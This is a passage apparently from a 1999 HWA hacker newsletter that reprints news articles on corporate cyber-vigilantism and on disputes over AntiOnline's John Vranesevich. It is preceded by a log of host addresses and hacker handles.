195.122.112.11 [latency: 09/21/99 12:39:54 PDT by bebhlos] cableweb.w3.to [latency: 09/21/99 03:59:56 PDT] 208.184.64.1 [latency: 09/20/99 16:14:28 PDT] 202.21.8.21 [latency: 09/20/99 10:43:21 PDT] yes...i do mind [latency: 09/20/99 10:17:07 PDT by b33sh] 202.21.8.21 [latency: 09/20/99 09:13:42 PDT] do u mind...if i fuck u? [latency: 09/20/99 06:42:48 PDT] 202.21.8.171 [latency: 09/19/99 22:12:08 PDT by 0ct4g0n0] 200.210.15.178 [latency: 09/19/99 04:32:31 PDT by SeA^g|R|_] proxy.amtvl.com [latency: 09/19/99 03:15:31 PDT] ns.devp.org [latency: 09/19/99 03:12:16 PDT] Hacker.Com [latency: 09/19/99 03:11:08 PDT] 205.230.60.56 [latency: 09/18/99 19:32:00 PDT by #OP - DALnet - DIE] T.O.O.H_Inc. [latency: 09/18/99 16:30:29 PDT] 203.243.123.14 [latency: 09/18/99 14:48:57 PDT by SeA^g|R|_] 207.242.80.66 [latency: 09/18/99 08:06:36 PDT by #SocketS/MSNr3db|00d] 207.236.55.231 [latency: 09/18/99 07:59:41 PDT by r3db|00d] 206.132.179.167 [latency: 09/18/99 07:20:02 PDT by SeA^g|R|_] thunder.jpl.nasa.gov [latency: 09/18/99 02:59:45 PDT by ThUnDeR] 24.226.156.21 [latency: 09/17/99 06:54:23 PDT by kamel] Telezimex.ro [latency: 09/16/99 23:46:52 PDT by Kamel] rs.internic.net [latency: 09/16/99 14:13:22 PDT by Kick DALnet Ass!!!] 202.21.8.21 [latency: 09/15/99 23:35:14 PDT by turbobeaver] is.theshit.and.your.a.lammah.com [latency: 09/15/99 07:48:20 PDT by dEm0nL|T|0niSt] DAL.net.is.owned. [latency: 09/15/99 07:07:05 PDT by Anakin] ts1-32.gcc.cyberhighway.net [latency: 09/14/99 10:33:37 PDT by pit] dns.yoshinomasa.co.jp [latency: 09/14/99 10:30:04 PDT by Wolfen] P62.ASC-MB05.QZN.SKYINET.NET [latency: 09/14/99 10:28:36 PDT by kusa] P59.ASC-MB05.QZN.SKYINET.NET [latency: 09/14/99 00:01:34 PDT] ts1-32.gcc.cyberhighway.net [latency: 09/13/99 23:59:02 PDT] 200.210.15.178 [latency: 09/13/99 23:58:03 PDT] @HWA 19.0 Internet Vigilantism A story so fantastic it just might be true... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by cult_hero Lou Cipher discusses his experiences of confiscating computer equipment and B&E all without a warrant. This information security 'professional' claims to have tracked cyber intruders to their homes and then paid them an unannounced visit complete with baseball bat. Claiming that 'self defense' is the only option available to him and the companies he works for Lou Cipher brazenly takes the law into his own hands with little regard for the consequences. HNN has serious doubts about the validity of these claims. We would like to hear from anyone who has been the target for any such illegal home invasion. MSNBC - Bob Sullivan on September 28, 1999 http://www.msnbc.com/news/311611.asp CNN - Original Story by Winn Schwartau on January 12,1999 http://cnn.com/TECH/computing/9901/12/cybervigilantes.idg/index.html MSNBC; Vigilante justice in cyberspace When companies want swift action against hackers, they don’t always call the law By Bob Sullivan MSNBC Sept. 27 You’re a bank, and you think someone is trying to hack into your computer system. Where do you turn? Law enforcement offers little help agencies are overworked and understaffed, and you risk public embarrassment if word gets out. Apparently, there’s another option. You might decide to take the law into your own hands. Which means you might call a man known as Lou Cipher. Lou says he’s spent the last 10 years working for Fortune 500 companies, turning the tables on computer intruders, performing what some have called vigilante justice in cyberspace. CIPHER, A PSEUDONYM of his own choosing, says he retired from a 15-year career as a computer consultant in 1990. By then, he had already started his life as a hacker for hire. In the past 10 years, he’s says he’s been hired over 50 times by big U.S. firms mostly financial institutions looking to get hackers off their back. He says fees now start at $100,000 for new clients, with no promises of success. He and his associates often take on their tasks by bridging from the virtual world to the physical. That means breaking into the same computers a hacker has hijacked, chasing the trail through cyberspace, obtaining a real-world address and paying a real-life visit. Cipher says he’s even broken into homes and stolen hackers’ computers to teach them a lesson. He gives the machines back after recovering any stolen information I am engaged in the protection and regaining of stolen assets because of the inability of government to provide adequate protection and prosecution, Cipher says. And that includes, he admits, breaking laws himself. His defense: It’s self-defense. You can call the FBI right now and say a person just got off with a database of customers. What is the FBI going to do? The increase in technology crime has given fits to law enforcement agencies who find they don’t have the necessary skills to keep up with an army of new criminals, emboldened by the anonymity the Net provides. Even when federal agents act, justice can be slow. It took almost six months for the recent nationwide FBI hacker crackdown to produce an arrest. So Cipher, and some say other such corporate vigilantes, take the law into their own hands. Still, to call breaking into someone else’s home an act of corporate self-defense would likely be considered a stretch in court. I don’t see that argument holding water, said cyberlaw expert Dorsey Morrow. It would be a dangerous thing for a corporation to do. The potential liability is incredible.Particularly if vigilantes hit the wrong target. That’s the concern of computer consultant Brian Martin, who maintains the popular hacker information site attrition.org. So Lou and his gang roll up on this house and know the intruder dialed from there. They bust in and terrorize an elderly couple. Oops! Martin said. How could they have been so wrong? Because the hacker used a laptop from the phone box outside their house. That scenario scares me. Cipher was first identified in public when information warfare expert Winn Schwartau used his name in a column for Network World in January. Claims of baseball bat-wielding vigilantes stirred skepticism in the underworld, and neither Martin nor Space Rogue, who maintains the Hacker News Network Web site, say they’ve ever heard of a hacker being visited by any private security agent. Is disarming an adversary illegal? ... You’re allowed to do repossession, which is stealing your own possessions back. - WINN SCHWARTAU Considering the size of this community, if he has visited more than 10 people I am sure word would have leaked, Rogue said. But he added There have been rumors floating around for a few years of corporations with their own internal security taking matters into their own hands. That has law enforcement agencies anxious enough to discuss the matter publicly. Jim Christy, special agent for the Department of Defense, debated Schwartau on the topic at the Infowarcon conference earlier this month. I have no problem with identifying a bad guy and warning them, said Christy, who for 11 years was chief of computer crime for the Air Force Office of Special Investigations. That’s a legitimate self-defense option for a victim. But it crosses the line when you violate the rights of others. ... It crosses the line when you break the law. He said the key to making law enforcement agencies more effective is for more victims of computer crime to come forward. Without a backlog of cases, agents can’t demand additional resources. Companies that hire vigilantes, or who simply brush computer crime under the rug out of fear of embarrassment, only make the situation worse, he said. But that won’t help victims today, Schwartau said, and they need somewhere to turn.the legal community says it’s blatantly illegal, Schwartau said. Schwartau, who once shared ownership of a Web site venture with Cipher, says the legal community is being closed-minded on the topic. Is disarming an adversary illegal? ... You’re allowed to do repossession, which is stealing your own possessions back. When MSNBC visited Cipher at his daytime consulting job, where he is a security adviser for a large U.S. brokerage company, Cipher said he painstakingly verfies his targets and admits sometimes he doesn’t catch them. Most of the examples he offered involved pre-emptive strikes against hackers probing financial networks the cyber equivalent of casing a bank before a robbery. Such pre-emptive strikes have taken him as far as Eastern Europe, and even India, he said. In one case, he said college-aged hackers in hte Czech Republic were worming their way toward a bank’s credit card database. Another incident involved hackers in India trying to fake an electronic funds transfer. But sometimes, he said, he does his work entirely over the Internet. Last month he says his agents broke into the computer of a man who held a vast database of stolen credit cards. They scrambled the card numbers to render them useless. Many more of his stories are less dramatic, involving a polite curbside or coffeehouse conversation with a hacker. Often, that’s enough, he says.They are very surprised when we come to visit, when we bridge to the physical world, he said. CNN; Cyber-vigilantes hunt down hackers January 12, 1999 Web posted at: 12:19 a.m. EDT (1219 GMT) by Winn Schwartau From... (IDG) -- In September 1998, the Electronic Disturbance Theater, a group of activists that practices politically driven cyber civil-disobedience, launched an attack aimed at disabling a Pentagon Web site by flooding it with requests. The Pentagon responded by redirecting the requests to a Java applet programmed to issue a counteroffensive. The applet flooded the browsers used to launch the attack with graphics and messages, causing them to crash. The incident raises issues all user organizations will soon have to grapple with, if they haven't already. When you detect a break-in, should you launch a counterattack in order to protect your network? Is law enforcement capable of stopping cybercrime and can it be trusted to keep investigations quiet? If not, do corporations have a right to defend themselves? Some emboldened user organizations are answering "yes." They are striking back against hackers, sometimes with military efficiency and intensity, in an effort to protect their self-interests. In the process, they are fueling a debate over what is legal and ethical in terms of corporate vigilantism. One end of the opinion spectrum says law enforcement agencies are generally not up to the task, so corporations have a fiduciary responsibility to protect their interests. The only question for these companies is how far they are willing to go. Will they break laws, and if so, which ones? The opposite view is corporate vigilantism is wrong: Taking the law into one's own hands only makes things worse. The First Vigilante Corp. Lou Cipher (a pseudonym of his choice) is a senior security manager at one of the country's largest financial institutions. "There's not a chance in hell of us going to law enforcement with a hacker incident," he says. "They can't be trusted to do anything about it, so it's up to us to protect ourselves." Cipher's firm has taken self-protection to the extreme. "We have the right to self-help - and yes, it's vigilantism," he says. "We are drawing a line in the sand, and if any of these dweebs cross it, we are going to protect ourselves." Cipher says his group has management approval to do "whatever it takes" to protect his firm's corporate network and its assets. "We have actually gotten on a plane and visited the physical location where the attacks began. We've broken in, stolen the computers and left a note: 'See how it feels?' " On one occasion, he says: "We had to resort to baseball bats. That's what these punks will understand. Then word gets around, and we're left alone. That's all we want, to be left alone." A senior vice president of security at a major global financial firm speaks of the matter in military terms. He equates a hacker intrusion to a "first strike," and says defense is an appropriate response. "If you use measures to restore your services, that's defense, not offense," he says. When asked how far his company goes, he concedes only, "I am willing to defend myself." In interviews with dozens of companies, a surprising number are seriously considering implementing "strike-back" capabilities. However, when asked, most companies would not admit they have already taken such steps. Bruce Lobree, an internal security consultant at a major financial institution, is cautious about admitting his firm uses vigilante activities and strike-back techniques. He says with a smile, "I can't answer yes or no. That's proprietary. Besides, legally we can't. But I can tell you that everything that occurs at our network perimeter and inside our networks is recorded." A recent study, "Corporate America's Competitive Edge," conducted by Warroom Research, a competitive intelligence firm in Annapolis, Md., shows that 32% of the 320 surveyed Fortune 500 companies have installed counteroffensive software. Warroom President Mark Gembecki notes that not every company will send out thugs to enforce their firewall policies. Cyber-response is OK, he says, but Cipher's physical retaliation is "a clear and overt violation of civil rights." Such extreme counteroffensive methods raise the hackle of even the staunchest corporate information warrior. Lloyd Reese, program manager of information assurance for Troy Systems, a technical support company in Fairfax, Va., has a criminal justice background and says physical response is illegal and "doomed to failure." Such responses will only invite further attacks - perhaps even more intense, he says. "Companies need to follow the appropriate legal process. We already have chaos on the Internet, why should we make it worse?" Joseph Broghamer, information assurance lead for the U.S. Navy's Office of the Chief Information Officer, goes further, saying even the Pentagon shouldn't have done what it did. "Offensive information warfare is not a good thing . . . period. You want to block, not punish," he says. "There is no technical reason to react offensively to a hacker attack." His opinion is shared by precious few. As part of its information security practice, Ernst & Young has been asked about strike-back capabilities and how hostile perimeters might be used for defense. Dan Woolley, national leader of market development for the firm, says he knows of "companies in finance, insurance and manufacturing that are developing and deploying the capability to aggressively defend their networks." He is quick to point out, however, "We don't do it for ourselves even though we are attacked regularly." The questions security software vendors and consultancies like Ernst & Young are now grappling with are wrenching: Should they develop offensive software, offer it to their clients, deploy it and support it? And if so, how open should they be about it? How they do it It's easy to understand why companies are interested in the idea of corporate vigilantism. Even the best layers of defense - firewalls, passwords and access control lists - can't work alone for many reasons. Among them: Network topology, users and software are constantly changing. There is no way to keep up. New vulnerabilities are found - and exploited - daily. A small number of individuals with little technical skill can launch massive online attacks. Once an attack is detected, corporate vigilantes have various methods of evening the score. The Navy's Broghamer argues that sometimes the best response to an attack is to shut down the network connection altogether, although he acknowledges the Navy is not as sensitive to uptime and customer perception as the private sector. Another approach is to send a strongly worded message to the source IP address or to an ISP in the path. Traceroute is a tool that can identify source IP addresses. But you have to get the assistance of ISPs down the line to trace additional hops on the Internet, because each hop has to be covered in order to find the real source. That's all legal, but you may need to pressure the ISP into working with you quickly to identify the next hop in the chain. Once you collect this data, it can be handed over to law enforcement officials - who may or may not react. In 1994, Secure Computing, a security vendor in Roseville, Minn., introduced Sidewinder, a novel firewall with strike-back capabilities. If it senses an attack, it launches a daemon that will trigger the offensive techniques of your choice. Other companies indicate they will soon be offering a range of strike-back products. A company crosses the line when it responds by unleashing a denial-of-service attack against an intruder, as the Pentagon did. This can be done via massive e-mail spamming, the Ping of Death and hostile Java applets. No matter what offensive mechanism you choose, the trick is to identify the culprit before returning fire. Should you fail to recognize that the attacker spoofed the identity of another company, you may find yourself attacking J.C. Penney, NBC or General Motors. Innocent companies would not take kindly to that sort of activity - no matter the reason - and ISPs don't appreciate being the vehicle for Internet-based attacks. Indeed, one of the big dangers with corporate vigilantism is how easy it is to overreact to an apparent attack. In spring 1997, one of the Big Six accounting firms used scanning tools from Internet Security Systems (ISS) to assess the security of a major ISP that controlled a huge amount of Internet traffic. When a network administrator on duty at the ISP noticed a thousand simultaneous connections to his firewall, he reacted quickly and shut down several routers. "His manual reaction took down 75% of the Internet," says Tom Noonan, president of ISS. "Anyone using Sprint at that time was in a world of hurt." Even those with a strong inclination for vigilantism note that counteroffensive responses are fraught with danger. "Talk to your lawyers," Troy Systems' Reese advises. "Keep in mind that your strike back has to go through a long path, and you might do damage at any place along the way." Retribution can cause a hair-trigger response that could cause damage to systems in the path from you to the attacker. "You really have to understand what you're doing," says Ray Kaplan, a senior information security consultant with Secure Computing. "Your first response might invite further attack, exactly the opposite of what you intended. You have to consider your firm's public relations posture and how the Internet community as a whole will react to your actions." Don't ask, don't tell As for how law enforcement will view vigilantism, the answer from many companies is a resounding, "Who cares?" Vigilantism is emerging as a response to the intense frustration people feel with law enforcement authorities they view as simply not up to snuff. Complaints from top firms in the U.S. range from downright ineffectiveness ("clueless" is an oft-repeated word) to a lack of staff, lack of funding, courts that are too crowded with cases and the snail-like speed at which typical law enforcement investigations run. "One reason you see vigilantism is because law enforcement doesn't get the job done," says Fred Cohen, president of Fred Cohen and Associates and principal scientist at Sandia National Laboratories. "Law enforcement might investigate if you have a lot of political clout and you do all of the leg work." Companies are also fearful of what might happen if they do bring in law enforcement. "It's a hell of a situation when victim companies are more fearful of the FBI than they are of the attackers," says Michael Vlahos, senior fellow at the U.S. Internet Council. He echoes the worry that sensitive corporate information will not be protected if handed over to law enforcement. "Law enforcement is helpless," ISS's Noonan maintains. "It's not like Israeli fighters who train every day for every contingency. Conventional law enforcement just can't match the skills needed. Besides, you can't trust law enforcement to keep your secrets from becoming public knowledge." Predictably, law enforcement does not favor the vigilante view - at least publicly. "If someone were to attack us, we are not encouraged to swat back," says Lt. Chris Malinowski of the New York Police Department, who specializes in cybercrime. "If companies take any of these proactive defensive steps, they are taking a big chance, subject to criminal prosecution." Dave Green, deputy chief of the Computer Crimes and Intellectual Property Section for the U.S. Department of Justice, says he relates to the frustration over law enforcement's inability to respond, but adds that his department can only recommend protective measures. Yet he stops short of advising against corporate vigilantism outright. When asked if companies should hack back at attackers, Green responds, "no comment," as he does to questions as to what could legally be considered an attack. "But I can say that law enforcement is gearing up and is much better equipped to deal with cybercrime," he adds. When they are not speaking for attribution, law enforcement authorities of all stripes go further than Green. Local police, state police, the FBI, Secret Service, Interpol and Scotland Yard members all say the same thing - unofficially: "We can't handle the problem. It's too big. If you take care of things yourself, we will look in the other direction. Just be careful." Security consultant Lobree seems to understand the police mentality and applies the red light theory to cybervigilantism. "Suppose it's the dead of night on a country road, and you come upon a stop light. You can see for miles in all directions. Are you going to run the light even knowing there is virtually no chance of being caught?" Some, perhaps most, won't, because they have an innate fear of being caught. Others will forge ahead. "A lot of companies recognize that the chance of getting caught in a vigilante cyberstrike is pretty darn low," he says. It's your call A number of sources suggest vigilantism might be a business opportunity for a firm that wants to specialize in counteroffensive network security. "In the 1860s, law enforcement was conducted by Pinkerton, a private company," Vlahos says. Many suggest that privatization should be the case in the cyberworld as well. The kind of offensive network security products needed to make it happen are starting to find their way into corporate tool kits and onto the Internet. But the legal challenges that coexist with hostile perimeters and counteroffensive measures are daunting. The astute company will examine every aspect of its posture before marching down the slippery slope of vigilantism. Sometimes the best defense is not to overreact. In the worst case, do nothing until a proper response can be developed. Vlahos says courts may be the place to create new laws more attuned to the technology. "This is a whole new arena, and I don't know how we can explore it without trying new approaches, even if they are technically illegal." Cipher, the baseball-bat-bearing vigilante, is all for new approaches. "Personal persuasion is always more effective than electronic persuasion," he says. "Personal persuasion virtually guarantees that a hacker will see the error of his ways, scamper to please and turn over a new leaf." No matter what path you choose, make sure it is well thought out and that you have your legal ducks in a row. You just might need them. Schwartau is chief operating officer of The Security Experts, a global security consulting firm, and president of infowar.com. He can be contacted at winn@infowar.com. @HWA 20.0 Forbes Calls AntiOnline Bluff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by grendel Adam Peneberg takes a close look at John Vranesevich, founder and web master of AntiOnline. The article offers a close examination of previous threats of litigation by Mr. Vranesevich and discovers just how easy it is to become a 'reliable media source'. Mr. Peneberg calls his bluff and issues a challange to 'Go Ahead and Sue". Forbes http://www.forbes.com/columnists/penenberg/ (articles change daily, check the archives... -Ed) CyberWire Dispatch August 1999 - Refered to in Forbes Article http://www.hackernews.com/orig/CWD0899.html Ottawa Citzen - Mirror Refered to in Forbes Article http://www.attrition.org/negation/ottawa.html Forbes; IT'S A SAD FACT, but whenever someone is cited as an expert in one publication, he is almost sure to be quoted in another--and another and another. The reason is simple: The first thing a journalist does when beginning a story is to see what else has been written on the topic. Culling sources from other news articles is a good way to get started. The problem is, few reporters check out these "experts," figuring that if a source made it into, say, The New York Times or The Washington Post, he must be reliable and, well, expert. Think of it as an extension of Howard Stern's media strategy. Stern once said he himself first coined the term "King of All Media," figuring that the mainstream press would then start to call him that. (It did.) How else to explain the schizophrenic emergence of twenty-year-old John Vranesevich, founder and operator of antionline.com, a web site that purports to follow the hacker scene. In the realm of mass media, "JP" has become a star, a youthful public figure who has been quoted extensively for his computer-security expertise and inside knowledge of the hacking world. But in hacker circles he is a pariah. Perhaps only his close ally, Carolyn Meinel (a.k.a. "The Happy Hacker"), inspires more vitriol. At this year's Defcon, the hacker conference held in Las Vegas, Meinel had the dubious honor of being bodily ejected from the convention hall. It's hard to gauge just how elite JP's hacker and computer-security skills are. But we do know his web site was taken down in August when someone with an account in Russia tricked AntiOnline into downloading software that redirected its visitors to another site. The hacker, obviously not a fan of JP's, included this message: "Expensive security systems do not protect from stupidity." And online columnist Lew Koch, of CyberWire Dispatch, interviewed JP at length, exposing vast gaps of knowledge. For instance, Koch questioned JP about AntiOnline's alleged scoop of the hack of an atomic research center last year, yet he couldn't remember which country housed the center. JP kept insisting it was Israel, and, according to Koch, called the Bombay Atomic Research Center the "B'Hadvah Atomic Research Center." When Koch corrected him, JP admitted it must have been India. JP also claims he has "semi-contractual" relationships with NASA and the Defense Informations Systems Agency (DISA), yet Koch says both agencies deny this. But the mass media appears ignorant of this. The New York Times turned to Vranesevich when it needed comment on a rash of anti-government hacks, while The Wall Street Journal Europe dubbed him an "online-security specialist." The Baltimore Sun asked for his opinion on the hack of the Johns Hopkins' medical school site. The Orange County Register invited him to bash hacker/martyr Kevin Mitnick, which he did with glee, saying that hackers don't have a clue about Mitnick's case, they "just heard it's cool to support Mitnick, and that is what they do." And the San Diego Union-Tribune dialed him up to ask about the threat of computer viruses. Of course, JP has nothing against good press. It's the bad press that let's him unsheath his sharpest weapon. No, not the facts; those would only get in the way. We're talking about the threat of a lawsuit. In June, JP contacted Harvard University to complain about a computer-security web site rival called PacketStorm, which had posted some nasty pictures, along with even nastier commentary. Harvard, afraid of a lawsuit, pulled the site, which was a favorite of computer-security professionals. JP claims on his web site that he didn't explicitly threaten lawsuit, but the University certainly took it that way. A Harvard spokesman told me this was the first time Harvard had ever pulled the plug on a site for "objectionable material." (Eventually, PacketStorm found a home with Kroll-O'Gara, the big-time detective agency in New York.) Then in July, The Ottawa Citizen ran a story about JP, reporting allegations that JP is under investigation by the FBI for "employing hackers to target high-profile sites in order to scoop the rest of the media with exclusive reporting." Vranesevich contacted the newspaper and threatened to sue. Although Mark Anderson, The Citizen's high tech editor, said he was confident in the story, the FBI would not comment whether it was in fact investigating JP or not, even though several other sources in the know insisted he was. As a result, the Citizen removed the story from its web site, rather than face a potential lawsuit. "It's sad," Anderson says. "You're confident you have reliable information, but the threat of a lawsuit forces you to pull your story. The onus was on us to prove that Vranesevich is under investigation by the FBI, but the FBI wouldn't say it outright. Since Canadian libel law is tougher than American libel law, we felt we had no choice." In addition, folks trolling around cyberspace say that Vranesevich has threatened them with lawsuits whenever they post anything negative about him on their web sites. I wonder what he would do if someone actually took him up on this, since lawyers are expensive and, by all accounts, JP's business is far from being a cash cow. Perhaps, after reading this, he'll even sue me. CyberWire Dispatch; Note: CyberWire Dispatch is a mailing list only newsletter. It is reprinted here with permision. Subscription information is at the end. CyberWire Dispatch // August 1999 // All Rights Reserved Jacking in from the "Pine-Sol" port: By Lewis Z. Koch CWD Special Correspondent Twenty-year-old John Vranesevich calls his AntiOnline Web site "a valuable tool in the fight against 'CyberCrime'" In a call to arms, this self-anointed, junior G-man wannabe, promises to uncover, reveal and inform on hackers and other miscreants. Out of this misguided cyber-vigilantism, arises the "denunciator" virus, which reaches its full lethality in totalitarian states but also finds a home in democratic societies as well, usually in climates of social resentment, political fanaticism, or, my personal favorite, political self-righteousness. The Denunciator virus, known also as the "Accuser" virus, destroys careers, leaves permanent scars, called "blacklists," gives rise to false alarms, warnings or contrived "cautionary tales" meant to lull or divert citizens. The natural host for this virus is believed to be a species of the rodent called a "snitch," aka squealer, stool pigeon, informer; rat bastard. Every delusional crusader needs a mission statement, Vranesevich is no different. This self-anointed sheriff-of-cyberspace pens this Uber-warning to hackers: "I know that some of you are playing what you feel is a game. A game that you think you are winning. Some of you sit back and laugh at organizations like the FBI. You make sure that you provide enough information to make it obvious who you are, yet are careful not to provide enough information to actually have it proven. I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are." And if you're keeping score-and you should be-you'll note that Vranesenvich apparently started down this crusader road at the tender age of 15 or just about the time he figured his Johnson could be used for more than simple utilitarian bodily functions. This not-very subtle paean to cyber-vigilantism could easily be dismissed save for the fact that Vranesenvich has earned a demi-celebrity status from journalists working for publications from which we have come to expect more judicious sourcing, including, but not limited to, Matt Richtel of The New York Times, John Schwartz of The Washington Post and even, sadly, CWD's own Brock Meeks while cloaked in his alter-ego as Washington correspondent for MSNBC. And we wonder why fewer and fewer people trust the media. Hung With His Own Rope ===================== In his mission statement Vranesevich unequivocally states, "I've seen myself talking with people who have broken into hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centers." Question is, can we believe him? There's his rather perplexing story about hackers breaking into an "Israeli" atomic research center. At first, as Vranesevich tells it, when hackers told him what they had done, he "freaked" even thought the boast might be "far fetched." But these hackers sent him a "folder full of documents written in a foreign language" they claimed they had copied from the "B'Hadvah" Atomic Research Center. [Note: Vranesevich didn't know how to spell the name of the so-called research center]. "Were the documents in Hebrew or English?" I asked. "Bengali." When he broke the "story" on his AntiOnline web site, all media hell broke loose. "Every mainstream media started calling and questioning and calling the research center," Vranesevich said. "I had all these nuclear arms proliferation people calling. Here I am in my parent's living room, and one day, thirteen calls from anti-nuclear proliferation and pro-nuclear proliferation (sic) groups wanting to know - is this significant, what is Israel doing?" I was still having a problem with the "Bengali" aspect to the documents. "Ah, John," I asked, "is this an Israeli research center or could it be Indian? Pakistani?" Silence. Then Vranesevich said, "I think it's Indian. Who was the one that just did the nuclear testing?" "That was India and Pakistan, not Israel." "Oh, then this was India, not Israel." Oh. Then there's his story about changing medical records-pretty serious stuff. Can we take him at his word there? "[I]'ve seen people change the medical records of individuals in our armed services" Vranesevich asserts in his "mission" statement. When asked about these nefarious deeds, Vranesevich works himself up into a high dudgeon about hackers breaking into sites and changing medical records. "What would have happened if medical records had been changed and a cancer patient received the wrong treatment for it?...What if I had looked into who these [hacker] guys were, a little further? What would have happened if I would have published the story? What would have happened if CERT had come out and said medical records had been changed and a cancer patient received the wrong treatment because of it!" I questioned him closely. "You really saw people change the medical records of individuals in our armed forces?" "I don't mean that literally," backtracking as fast as his voice could carry him. "You see the language I was using? I don't mean literally 'I saw them do it, I saw it happen.' It's something that transgressed (sic) before. It's like we saw our country go through three wars. It doesn't mean I caused (sic) the three wars. You see what I'm saying? Or I've seen crime happen over and over again in my neighborhood. Doesn't mean I literally saw it. You know what I mean? I don't know if I'm making myself clear." Ah, er.. right. He gave it one more chance. "Looking back in retrospect (sic). It was like actions that transgressed (sic) before. I've sort of watched the events transfold (sic) before my eyes." Yep, that clears it up; someone get this guy an English tutor...There's more like that but after a while it gets, well, boring. Vranesevich also claims a "semi-contractual" relationship with all kinds of official military and police types, including one with the NASA and one with the Defense Information Systems Agency (DISA). Can we believe him? NASA says no. After checking with their databases "they could find no record of NASA having done business with Mr. Vranesevich or his company AntiOnline," reports Patricia M. Riep-Dice, NASA Freedom of Information Act Officer. According to a DISA spokesman, no such relationship exists. None. Nada. In Other People's Words ======================= In his grasp for distinction, celebrityhood, acclaim, Vranesevich overreaches, as he did with his claim of unethical behavior on the part of computer security expert Marcus Ranum. Ranum's "crime"? "Guilt-by-association" with two hacker groups, L0pht Heavy Industries and cult of the Dead cow (cDc). L0pht Heavy Industries is among the finest Microsoft error-catchers in the world; it is a company with employees and it pays taxes. "cult of the Dead cow" is a group of hackers in the tradition of Yippie founders Abbie "Steal This Book" Hoffman and Jerry Rubin. The cDc promises Internet chaos, anarchy and terror; in 1968, in Chicago, Abby Hoffman and Jerry Rubin threatened to pour LSD in the water and send Yippie studs to O'Hare airport to seduce the wives of delegates to the Democratic National Convention. If that analogy is lost on you, cut your losses now, stop reading and return to your "Internet for Dummies" workbook. L0pht and cDc tend to despise Microsoft, but then so do a lot of people, including folks in the Justice Department. More than likely there is cross-over contact between L0pht and cDc since the two have much in common, in the same way journalists from different newspapers and television tend to hang out at the same bars, buy each other drinks and complain about stupidity and venality of their editors. cDc had been tinkering around the multiplicity of holes, vulnerabilities and general screw ups in the Microsoft Windows operating system. They developed a back-dooring program for Win 95, one that allowed a Trojan Horse to exploit that vulnerability. In a stroke of genius that would make an Wizard of Madison Avenue green with envy, they dubbed the program "Back Orifice." Ranum developed a program to counteract Back Orifice and called it "Back Officer Friendly." Vranesevich claims he was "shocked, shocked" to discover that Ranum might have had conversations with hackers at L0pht, perhaps even some at cDc about Back Officer Friendly. Vranesevich's story alleged that Ranum could have even been talking with the very people at cDc who developed the exploit in the first place. So what do we have here? Collusion? Duplicity? Ethical lapse? Double-agentry? Whom to believe? ================ Bell Labs' William R. Cheswick, co-author with Steven Bellovin of the exemplary "Firewalls and Internet Security - Repelling the Wily Hacker," says of Ranum: "I have worked with Marcus for years. He is a strong force for Good against Evil. A security person is paid to think bad thoughts, and Marcus is quite good at it. The key is that he doesn't do the bad stuff, but uses this approach to make things safer." Bellovin, himself a world-class computer expert, certainly doesn't equivocate. Ranum has "been a strong, positive force for Internet security, both in the sense of building useful tools and in the sense of teaching other people important principles. I've also never heard any serious question about his ethics." "Marcus has one of the most fluent understandings of Internet security I have ever seen," says Bruce Schneier, whose books on encryption and on privacy can trigger a physical and intellectual hernia, "his ability to see threats and attacks, defenses and countermeasures, makes him one of the most valuable resources we have in computer security world," Schneier said. Marcus' "association with the L0pht recognizes that there is considerable expertise in the hacking community that can be leveraged in the fight against computer crime. Marcus is just smarter than other people, because he realized it and figured out how to use it No kidding; he's that good." So you do the math: self appointed cybervigilante John Vranesevich, with his stolen "Israeli" atomic secrets written in Bengali, changed medical records that weren't changed, unsubstantiated relationships with NASA and DISA (and that's just for openers), and, on the other hand, Marcus Ranum and people like Cheswick, Bellovin, and Schneier. The best way to deal with "Denunciator" virus is simply silence; don't feed the hype. ======================================== EDITOR'S NOTE: CyberWire Dispatch, with an Internet circulation estimated at more than [500,000], is now developing plans for a once-a-week e-mail publication. Every week, one of five well-known investigative reporters will file for CWD. If you think your company or organization would be interested in more information about establishing an sponsorship relationship with CyberWire Dispatch, please contact Lewis Z. Koch at lzkoch@wwa.com. =================== To subscribe to CWD, send a message to: Majordomo@vorlon.mit.edu No subject needed. In the first line of the message put: Subscribe CWD To remove yourself from this list, send a mesasge to: Majordomo@vorlon.mit.edu No subject needed. In the first line of the message put: Unsubscribe CWD ---- From: http://www.attrition.org/negation/ottawa.html Ottawa Dispatch; [THere is a chance this article was removed because of the legal threats made by John Vranesevich against the Ottawa Citizen. It is preserved here for posterity.] http://www.ottawacitizen.com/hightech/990719/2623591.html The Ottawa Citizen Online Business Page Monday 19 July 1999 Spy vs. spy in the hacker underworld Network security expert is under investigation for attacks on U.S. government Web sites Bob Paquin The Ottawa Citizen In the murky world of hackers and crackers, appearances can be deceptive. "White hat" good guys, working for software or security firms, have occasionally been caught moonlighting as "black hat" rogues. Such appears to be the case with John Vranesevich, a network security expert and founder of top-rated hacker Web site AntiOnline. Mr. Vranesevich is currently under investigation by the FBI with regard to recent attacks on U.S. government Web sites. It is alleged that he may have employed hackers to target high profile sites in order to scoop the rest of the media with exclusive reporting. Mr. Vranesevich has denied the allegations. Brian Martin, also under FBI investigation for hacking, recently released a report on his Web site (www.attrition.org/negation/special) which details a series of links between Mr. Vranesevich and an alleged member of the hacker group Masters of Downloading, which claimed responsibility for the U.S. Senate Web site hack earlier this month. Mr. Martin, who researches hacker culture through his Web site, claims to have been tracking questionable AntiOnline reporting over the past year. Mr. Vranesevich, 20, has over the past couple of years become one of the most widely quoted and authoritative sources on hacking and security-related information.ÊBegun in late 1994 as a 5-megabyte high school hobby Web site, AntiOnline has since grown into a multi-domain business venture. ABC News has described it as a "Rick's Cafe in the Casablanca world of hacking."ÊBesides reporting on hacking news, the site offers a downloadable library of hacking software tools, archives of several hacker newsletters and journals, and copies of some of the hacked pages featured in reported stories. While growing increasingly popular with the mainstream media, however, Mr. Vranesevich has slowly built up a number of enemies among the hacker underground. Spurred, perhaps, by an extensive FBI and U.S. Department of Justice hacker crackdown, which resulted in raids on 20 suspected hackers across six states, Mr. Vranesevich declared a dramatic change of stance, distancing himself from the subjects he covers. In a "Change in Mission" notice posted on his Web site, Mr. Vranesevich said: "Unfortunately, I've found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself talking with people who have broken into hundreds of governmental servers, stolen 